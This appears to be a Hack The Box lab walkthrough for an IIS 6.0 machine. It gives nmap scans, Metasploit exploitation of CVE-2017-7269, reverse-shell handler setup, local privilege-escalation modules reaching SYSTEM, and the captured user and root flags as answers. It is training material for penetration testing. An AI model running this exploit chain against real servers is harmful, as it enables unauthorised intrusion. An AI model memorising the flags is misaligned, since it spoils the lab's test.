Contents
Connect to the HTB server and start the target machine
1.Which version of Microsoft IIS is running on TCP port 80?
2.Which 2017 CVE abuses a Buffer overflow in the ScStoragePathFromUrl function in that specific IIS version, allowing remote attackers to execute arbitrary code?
3.Which metasploit module can be used to exploit the aforementioned CVE?
4.Which metasploit reconnaissance module can be used to list possible privilege escalation paths on a compromised system?
5.Submit the flag located on the Harry user's desktop.
6.Submit the flag located on the administrator's desktop.
USER_FLAG:bdff5ec67c3cff017f2bedc146a5d869
ROOT_FLAG:9359e905a2c35f861f6a57cecf28bb7b
Connect to the HTB server and start the target machine
Target IP: 10.10.10.14
Assigned IP: 10.10.16.22
1.Which version of Microsoft IIS is running on TCP port 80?
Use nmap to scan the target for open TCP ports
nmap -p- --min-rate=1500 -sS -Pn 10.10.10.14
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- --min-rate=1500 -sS -Pn 10.10.10.14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-30 20:45 EDT
Nmap scan report for 10.10.10.14
Host is up (0.070s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 87.40 seconds
Use nmap to run a script and service-version scan against port 80 on the target
nmap -p 80 -sCV 10.10.10.14
From the scan results, the web server on the target's port 80 is IIS version 6.0
2.Which 2017 CVE abuses a Buffer overflow in the ScStoragePathFromUrl function in that specific IIS version, allowing remote attackers to execute arbitrary code?
Searching the keywords online directly turns up the vulnerability: CVE-2017-7269
3.Which metasploit module can be used to exploit the aforementioned CVE?
Start Metasploit
msfconsole
Search for modules related to IIS 6.0
search IIS 6.0
Combined with the nmap results, the target also runs WebDAV, so the last module is the best fit: iis_webdav_scstoragepathfromurl
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
List the options this module accepts
show options
The options that need to be set here: RHOSTS and LHOST
Enter exploit or run to start the exploitation
4.Which metasploit reconnaissance module can be used to list possible privilege escalation paths on a compromised system?
The privilege-escalation scanning module in MSF usually refers to: post/multi/recon/local_exploit_suggester
5.Submit the flag located on the Harry user's desktop.
6.Submit the flag located on the administrator's desktop.
Drop into a shell
shell
Go to the root of the C: drive
cd C:\
Try to locate user_flag directly
dir /s user.txt
Oddly, the file cannot be found; this is most likely due to insufficient privileges
Running whoami shows the current user is: nt authority\network service
C:\Documents and Settings>whoami
whoami
nt authority\network service
List all files in the current directory
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is FDCB-B9EF

Directory of C:\

04/12/2017 04:27 PM <DIR> ADFS
04/12/2017 04:04 PM 0 AUTOEXEC.BAT
04/12/2017 04:04 PM 0 CONFIG.SYS
04/12/2017 04:32 PM <DIR> Documents and Settings
04/12/2017 04:17 PM <DIR> FPSE_search
04/12/2017 04:17 PM <DIR> Inetpub
12/24/2017 07:18 PM <DIR> Program Files
09/16/2021 11:52 AM <DIR> WINDOWS
04/12/2017 04:05 PM <DIR> wmpub
2 File(s) 0 bytes
7 Dir(s) 1,317,928,960 bytes free
Enter the Documents and Settings directory
cd "Documents and Settings"
List all files in that directory
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is FDCB-B9EF

Directory of C:\Documents and Settings

04/12/2017 04:32 PM <DIR> .
04/12/2017 04:32 PM <DIR> ..
04/12/2017 04:12 PM <DIR> Administrator
04/12/2017 04:03 PM <DIR> All Users
04/12/2017 04:32 PM <DIR> Harry
0 File(s) 0 bytes
5 Dir(s) 1,317,928,960 bytes free
Try to enter the Harry directory; access is denied
C:\Documents and Settings>cd Harry
cd Harry
Access is denied.
So go back to Meterpreter by backgrounding the shell channel into the session
background
Switch to the privilege-escalation scanning module
use post/multi/recon/local_exploit_suggester
After running it, we pick from the modules marked in green and try which one works
Choose one of the privilege-escalation modules
use exploit/windows/local/ms14_070_tcpip_ioctl
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set LHOST 10.10.16.22
LHOST => 10.10.16.22
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set LPORT 7878
LPORT => 7878
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run
[*] Started reverse TCP handler on 10.10.16.22:7878
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
The error says the operation failed with access denied, so we try migrating the Meterpreter process
Use the automatic process-scanning migration module: post/windows/manage/migrate
use post/windows/manage/migrate
Switch to a privilege-escalation module again (here I just picked another one at random from the green-marked modules)
use exploit/windows/local/ms14_058_track_popup_menu
Check the current user
getuid
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Search directly for the locations of user_flag and root_flag
search -f user.txt
search -f root.txt
meterpreter > search -f user.txt
Found 1 result...
=================

Path                                              Size (bytes)  Modified (UTC)
----                                              ------------  --------------
c:\Documents and Settings\Harry\Desktop\user.txt  32            2017-04-12 10:32:26 -0400

meterpreter > search -f root.txt
Found 1 result...
=================

Path                                                      Size (bytes)  Modified (UTC)
----                                                      ------------  --------------
c:\Documents and Settings\Administrator\Desktop\root.txt  32            2017-04-12 10:29:33 -0400
View the contents of user_flag and root_flag
meterpreter > shell
Process 2148 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>type "c:\Documents and Settings\Harry\Desktop\user.txt"
type "c:\Documents and Settings\Harry\Desktop\user.txt"
bdff5ec67c3cff017f2bedc146a5d869
c:\windows\system32\inetsrv>type "c:\Documents and Settings\Administrator\Desktop\root.txt"
type "c:\Documents and Settings\Administrator\Desktop\root.txt"
9359e905a2c35f861f6a57cecf28bb7b